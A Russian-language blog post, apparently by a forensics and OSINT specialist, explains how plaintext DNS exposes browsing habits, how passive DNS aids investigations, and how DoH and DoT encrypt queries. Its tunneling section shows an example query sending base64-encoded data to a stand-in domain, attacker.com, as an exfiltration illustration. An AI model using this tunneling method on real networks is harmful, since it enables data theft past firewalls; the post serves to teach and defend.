59
Вы можете обмазаться VPN-ами, заклеить веб-камеру синей изолентой и использовать HTTPS везде, где только можно. Но если вы оставили настройки DNS по умолчанию — поздравляю, вы ходите по улице голым, прикрываясь прозрачным полиэтиленом.
DNS (Domain Name System) — это телефонная книга интернета. Вы вводите google.com , а DNS-сервер говорит вашему компьютеру: «Иди по адресу 142.250.x.x». И вот в чем ирония: пока содержание вашего разговора (HTTPS) зашифровано, то, кому вы звоните, видно всем, кто стоит на раздаче.
Давайте разберем, как этот древний протокол превращает вашу цифровую жизнь в открытую книгу для провайдера, хакеров и таких специалистов, как я.
Проблема 53-го порта: Болтун — находка для шпиона
Классический DNS работает по протоколу UDP на 53-м порту. И работает он в открытом виде (plaintext). Это значит, что любой узел между вами и DNS-сервером (ваш роутер, провайдер, админ корпоративной сети, товарищ майор на СОРМ-оборудовании) видит каждый ваш запрос.
Что они видят?
Они не видят, какое именно видео вы смотрите на YouTube. Но они видят:
1. youtube.com — 22:00 (ага, смотрит видосики).
2. api.tinder.com — 23:15 (ищет пару на ночь).
3. jobsearch.ru — 09:30 (собирается валить с работы).
4. depression-help.org — 03:00 (бессонница и проблемы).
Для форензика DNS-логи — это не просто список сайтов. Это паттерн поведения. Я могу составить ваш психологический портрет, просто глядя на домены, к которым обращается ваш смартфон, пока вы спите.
Умные устройства — тупые стукачи
Вы думаете, что контролируете свои запросы? Как бы не так. Ваши устройства болтают без умолку.
Умный холодильник стучится на серверы Samsung, китайская камера видеонаблюдения шлет “приветы” на непонятные IP в облаке Alibaba, а Windows тихо сливает телеметрию.
В ходе расследований мы часто ловим преступников не на том, что они гуглили «как спрятать труп», а на фоновом шуме. Например, телефон автоматически обновил погоду в конкретной локации или синхронизировал время через NTP-сервер, оставив след в DNS-логах провайдера. Алиби рассыпается в пыль.
Passive DNS: Машина времени для OSINT
Если вы думаете, что удалив историю браузера, вы стерли следы, у меня для вас плохие новости. Существует такая вещь, как Passive DNS.
Это огромные базы данных, которые собирают исторические связки “Домен — IP-адрес”.
Для OSINT-специалиста это золотая жила.
• Хотите узнать, на каких еще доменах висел этот подозрительный IP год назад? Passive DNS.
• Нужно найти все поддомены корпорации, чтобы найти забытую админку? Passive DNS.
• Нужно связать два, казалось бы, разных сайта мошенников? Мы смотрим историю смены их NS-записей (Name Server) и видим, что их администрировал один и тот же e-mail.
DNS-туннелирование: Как вынести данные под носом у фаервола
А теперь про высший пилотаж. DNS можно использовать не только для резолвинга имен, но и для передачи данных. Это называется DNS Tunneling.
Представьте, что вы сидите в корпоративной сети, где закрыто всё, кроме 53-го порта (потому что без DNS интернет не работает). Злоумышленник (или хитрый инсайдер) может передавать украденные файлы, кодируя их в поддомены.
Выглядит это так:
Запрос: V2VyeVNlY3JldERhdGE=.attacker.com
Ответ: IP address…
На сервере злоумышленника attacker.com специальный скрипт ловит эти запросы, берет кусок V2VyeVNlY3JldERhdGE= , декодирует его из Base64 и собирает файл обратно. Для обычного админа это выглядит как куча странных запросов к одному домену. Для меня — как красный флаг размером с небоскреб.
Как защищаются (и почему это бесит форензиков)
Чтобы закрыть эту дыру, придумали DoH (DNS over HTTPS) и DoT (DNS over TLS).
Эти технологии заворачивают ваши DNS-запросы в шифрованный туннель. Провайдер видит только кашу из байтов, летящую на 443 порт (HTTPS).
• Плюс: Провайдер не может продавать вашу историю посещений рекламщикам.
• Минус: Системные администраторы и безопасники теряют контроль над сетью. Вредоносное ПО тоже полюбило DoH, чтобы скрывать свои коммуникации с командными центрами.
Итог
DNS — это ахиллесова пята интернета. Это старый, болтливый протокол, на котором держится вся сеть.
Если вы не настроили защищенный DNS (на роутере или в браузере), считайте, что вы кричите о своих планах в мегафон посреди площади. А я, провайдер и хакеры стоим рядом с блокнотиками и записываем.